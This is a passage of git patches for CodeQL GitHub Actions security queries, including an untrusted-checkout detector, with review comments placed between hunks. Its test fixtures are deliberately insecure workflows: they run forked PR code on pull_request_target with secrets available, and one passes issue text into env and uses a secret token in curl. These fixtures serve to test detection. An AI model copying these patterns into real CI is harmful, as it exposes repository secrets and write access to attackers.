--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 54302b86e837..91741f587063 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 7904383d7076..dfa441761ab3 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 0c283016c86b..182977098389 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2694ec2c453c..3db3e9cf66c0 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index aee6172b5915..0190ffd9ad72 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 2167b16c7ba7..87610c434403 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index d90d7109fc2a..a8db7e8313e6 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 20a412fd9b72..d171499049aa 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 8d0731c97921..4ab448b04c1a 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 9364fd747526..299c387c81a8 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] 
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index f16b69c7af9d..6ce7dd68b3f0 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 59a4c5b56522..72df42535db9 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] From ecefb7ffb57aaf1e82293143dcd5a29397a62415 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:12:37 +0100 Subject: [PATCH 070/707] feat(untrusted checkout query): Add new query and tests --- ql/lib/codeql/actions/Ast.qll | 24 ++++++++-- ql/src/Security/CWE-094/UntrustedCheckout.ql | 47 +++++++++++++++++++ .../workflows/actor_trusted_checkout.yml | 26 ++++++++++ .../workflows/label_trusted_checkout.yml | 27 +++++++++++ .../.github/workflows/untrusted_checkout.yml | 25 ++++++++++ 5 files changed, 146 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.ql create mode 100644 ql/src/test/.github/workflows/actor_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/label_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f04005be8f6..339daf5365e1 100644 --- a/ql/lib/codeql/actions/Ast.qll 
+++ b/ql/lib/codeql/actions/Ast.qll @@ -22,9 +22,7 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { - this = result.getAChildNode*() - } + WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } } /** @@ -174,6 +172,8 @@ class JobStmt extends Statement instanceof Actions::Job { predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } + + IfStmt getIfStmt() { result = super.getIf() } } /** @@ -183,6 +183,24 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + IfStmt getIfStmt() { result = super.getIf() } +} + +/** + * An If node representing a conditional statement. + */ +class IfStmt extends Statement { + YamlMapping parent; + + IfStmt() { + (parent instanceof Actions::Step or parent instanceof Actions::Job) and + parent.lookup("if") = this + } + + Statement getEnclosingStatement() { result = parent } + + string getCondition() { result = this.(YamlScalar).getValue() } } /** diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql new file mode 100644 index 000000000000..4187e045c9b1 --- /dev/null +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql 
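Review bot: The new `getIfStmt()` predicates on `JobStmt` and `StepStmt` and the members of `IfStmt` carry no QLDoc, unlike the neighbouring predicates in this file. I would add `/** Gets the `if` condition guarding this job, if any. */` above each `getIfStmt()`, and on `IfStmt.getCondition()` note that it only has a value when the `if` node is a YAML scalar, since the `this.(YamlScalar)` cast silently drops any other shape. The first hunk of this file is a pure reformat of `getEnclosingWorkflowStmt()`; its doc comment still says "this job" although the predicate lives on `Statement`, so `/** Gets the workflow that this statement is a part of. */` would be more accurate.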
@@ -0,0 +1,47 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity warning
+ * @precision low
+ * @id actions/pull-request-target
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ */
+
+import actions
+
+/**
+ * An If node that contains an `actor` check
+ */
+class ActorCheckStmt extends IfStmt {
+ ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") }
+}
+
+/**
+ * An If node that contains a `label` check
+ */
+class LabelCheckStmt extends IfStmt {
+ LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") }
+}
+
+from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep
+where
+ w.hasTriggerEvent("pull_request_target") and
+ w.getAJobStmt() = job and
+ job.getAStepStmt() = checkoutStep and
+ checkoutStep.getCallee() = "actions/checkout" and
+ checkoutStep
+ .getArgumentExpr("ref")
+ .(ExprAccessExpr)
+ .getExpression()
+ .matches([
+ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%",
+ "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%"
+ ]) and
+ not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and
+ not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check)
+select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'."
diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/src/test/.github/workflows/actor_trusted_checkout.yml
new file mode 100644
index 000000000000..08a25646d6ae
--- /dev/null
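Review bot: `ActorCheckStmt` and `LabelCheckStmt` are substring matches on the condition text, so any `if:` that merely mentions `github.actor` or `github.event.pull_request.labels` is accepted as a gate, including one that only excludes an actor (for example `github.actor != 'some-bot'`) or one where the reference is a `||` alternative to an unrelated condition; neither of those restricts who can reach the checkout. If the library gives access to the expression structure I would only treat the reference as a sanitizer when it is the whole condition or an `&&` conjunct; failing that, the `@description` should state that any actor or label reference in the guarding `if:` suppresses the alert, which is presumably why the query is tagged `@precision low`. The sanitizer lookup only considers the `if:` on the job and on the checkout step itself, which is the right scope and is worth recording in a comment above the two `not exists(...)` lines, e.g. `// An if: on an earlier step does not gate the checkout, so only the job and the step itself count.`.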
+++ b/ql/src/test/.github/workflows/actor_trusted_checkout.yml @@ -0,0 +1,26 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + if: ${{ github.actor == "admin" }} + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/src/test/.github/workflows/label_trusted_checkout.yml new file mode 100644 index 000000000000..56bb143cf367 --- /dev/null +++ b/ql/src/test/.github/workflows/label_trusted_checkout.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/src/test/.github/workflows/untrusted_checkout.yml new file mode 100644 index 000000000000..a37ceb8f9f65 --- /dev/null +++ b/ql/src/test/.github/workflows/untrusted_checkout.yml @@ -0,0 +1,25 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! 
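Review bot: In `actor_trusted_checkout.yml` the guard `if: ${{ github.actor == "admin" }}` uses a double-quoted string, which the Actions expression syntax rejects (string literals are single-quoted), so the fixture does not represent a workflow that would actually run; `if: ${{ github.actor == 'admin' }}` keeps the test's intent and is what the `ActorCheckStmt` regex is meant to match in real workflows. The diffstat for this commit lists the three workflow fixtures but no expected-results file for the query, so if the test harness compares query output against a `.expected` file, that file appears to be missing here.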
From 68f15f2b85c24f38b1290ed70b8ae8e98d415ab3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 22 Feb 2024 13:14:53 +0100
Subject: [PATCH 071/707] rename query id
---
 ql/src/Security/CWE-094/UntrustedCheckout.ql | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql
index 4187e045c9b1..25d05f1b7c26 100644
--- a/ql/src/Security/CWE-094/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql
@@ -6,7 +6,7 @@
 * @kind problem
 * @problem.severity warning
 * @precision low
- * @id actions/pull-request-target
+ * @id actions/untrusted-checkout
 * @tags actions
 * security
 * external/cwe/cwe-094
From f513a19c243bbd4c0c82ce3d9714078fc3dfed0f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 23 Feb 2024 11:53:47 +0100
Subject: [PATCH 072/707] fix: restrict EnvCtxAccessExpr to Env decarlations on the same file
---
 ql/lib/codeql/actions/Ast.qll | 12 ++++--------
 1 file changed, 4 insertions(+), 8 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 339daf5365e1..68469ef2467c 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -500,15 +500,10 @@ class InputsCtxAccessExpr extends CtxAccessExpr {
 override string getFieldName() { result = fieldName }
 override Expression getRefExpr() {
- exists(ReusableWorkflowStmt w |
- w.getLocation().getFile() = this.getLocation().getFile() and
- w.getInputsStmt().getInputExpr(fieldName) = result
- )
+ result.getLocation().getFile() = this.getLocation().getFile() and
+ exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result)
 or
- exists(CompositeActionStmt a |
- a.getLocation().getFile() = this.getLocation().getFile() and
- a.getInputsStmt().getInputExpr(fieldName) = result
- )
+ exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result)
 }
 }
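Review bot: In the `InputsCtxAccessExpr.getRefExpr()` hunk the added same-file restriction only applies to the first disjunct: QL binds `and` tighter than `or`, so `result.getLocation().getFile() = this.getLocation().getFile() and exists(ReusableWorkflowStmt w | ...) or exists(CompositeActionStmt a | ...)` still resolves an `inputs.*` access to a `CompositeActionStmt` input declared in any file, which is exactly what the removed `a.getLocation().getFile() = this.getLocation().getFile() and` conjunct prevented. Parenthesise the disjunction: `result.getLocation().getFile() = this.getLocation().getFile() and`, `( exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) or`, `exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) )`. The `EnvCtxAccessExpr.getRefExpr()` hunk of the same commit has the same shape, with every disjunct after the first left unrestricted, although a later commit on this page rewrites that predicate entirely. The class header of `InputsCtxAccessExpr` is outside the hunk.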
@@ -528,6 +523,7 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { + result.getLocation().getFile() = this.getLocation().getFile() and exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) From 645177cc8083e2d6f249ec1feaba5b8d9687ef9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 09:39:42 +0100 Subject: [PATCH 073/707] Account for github.event.label check as a sanitizer for untrusted checkout --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 25d05f1b7c26..9c9b5f9eb26a 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -25,7 +25,10 @@ class ActorCheckStmt extends IfStmt { * An If node that contains a `label` check */ class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } + LabelCheckStmt() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or + this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + } } from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep From 98f3a1e7bf03d725889d4b0cdd3a9a066380424b Mon Sep 17 00:00:00 2001 
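Review bot: `LabelCheckStmt` is accepted as a gate for the checkout regardless of which `pull_request_target` activity types the workflow subscribes to, but a label only vouches for the commit that was reviewed when it was applied: with the default activity types a later push to the same PR re-runs the workflow while the label is still present, so the new head is checked out ungated. I would only let a `LabelCheckStmt` suppress the alert when the trigger is restricted to `types: [labeled]`, as the fixture `label_trusted_checkout.yml` already is; if the library does not expose the trigger's `types`, a comment on the class should record the assumption, e.g. `// Only a reliable gate when the workflow runs on the `labeled` activity type.`. The added `github.event.label.name` alternative is, as far as I know, only populated on `labeled`/`unlabeled` events, which fits that restriction.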
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 10:43:55 +0100 Subject: [PATCH 074/707] fix(env): Improve env access support --- ql/lib/codeql/actions/Ast.qll | 84 +++--------- ql/src/test/.github/workflows/cross1.yml | 160 +++++++++++++++++++++++ ql/src/test/.github/workflows/cross2.yml | 109 +++++++++++++++ ql/src/test/.github/workflows/cross3.yml | 67 ++++++++++ 4 files changed, 355 insertions(+), 65 deletions(-) create mode 100644 ql/src/test/.github/workflows/cross1.yml create mode 100644 ql/src/test/.github/workflows/cross2.yml create mode 100644 ql/src/test/.github/workflows/cross3.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 68469ef2467c..fd66acf530d8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,6 +23,21 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::Env env | + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + | + env.(Actions::StepEnv).getStep().getAChildNode*() = this + or + env.(Actions::JobEnv).getJob().getAChildNode*() = this + or + env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } /** @@ -212,8 +227,6 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); - - abstract Expression getEnvExpr(string name); } /** 
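Review bot: `Statement.getEnvExpr(name)` returns every `env` binding of `name` from any enclosing step, job or workflow block with no precedence between the three disjuncts, so for a variable declared at both workflow and step level both declarations are returned, and `EnvCtxAccessExpr.getRefExpr()` (rewritten later in this commit) will link the access to the outer value as well as to the one that shadows it at runtime. If the innermost declaration should win, guard the job and workflow disjuncts with a `not exists(...)` over the closer levels. The QLDoc was moved verbatim and still says "in the scope of the current step" although the predicate now lives on `Statement`; `/** Gets the expression bound to environment variable `name` by a step-, job- or workflow-level `env` block enclosing this statement. */` describes what the code does.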
@@ -234,26 +247,6 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - override Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -302,23 +295,6 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - override Expression getEnvExpr(string name) { - this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** 
@@ -332,26 +308,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -523,11 +479,9 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - result.getLocation().getFile() = this.getLocation().getFile() and - exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(RunExpr s | s.getEnvExpr(fieldName) = result) + exists(Statement s | + s.getEnvExpr(fieldName) = result and + s.getAChildNode*() = this + ) } } diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml new file mode 100644 index 000000000000..9927aca8c563 --- /dev/null +++ b/ql/src/test/.github/workflows/cross1.yml 
@@ -0,0 +1,160 @@ +# Issues_workflow.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/Issues_workflow.yaml#L128-L128) +name: Issue Workflow +on: + issues: + types: [opened,edited] +jobs: + #This job will check the issue to determine if it should be moved to a different repository + redirectIssue: + name: Check for issue transfer + runs-on: ubuntu-latest + env: + #The 'content_analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding any labels is necessary. + #The initial 'undefined' value will be overridden when the script runs. + content_analysis_response: undefined + ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_BODY: ${{github.event.issue.body}} + outputs: + result: ${{env.content_analysis_response}} + steps: + - uses: actions/checkout@v4 + + #Detect if the issue_title follows the regex expression + - name: Check Issue Title + uses: actions-ecosystem/action-regex-match@v2 + id: regex-match + with: + text: ${{github.event.issue.title}} + regex: '^[A-Za-z0-9 _.]*$' + flags: g + + #If the regex output is '' means that the issue title contains special chars + - name: Exit Job + if: ${{ steps.regex-match.outputs.match == '' }} + run: | + echo "Bad Issue Title Format" + exit 1 + + #Remove the " character in the issue title and replaced with - + - name: Remove conflicting chars + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: '-' + flags: g + + #According to the issue_title returns a specific label + - name: Check Information + id: check-info + env: + ISSUE_TITLE_PARSED: ${{steps.remove_quotations.outputs.replaced}} + run: | + echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: 
env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! + We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. 
Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." + #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh 
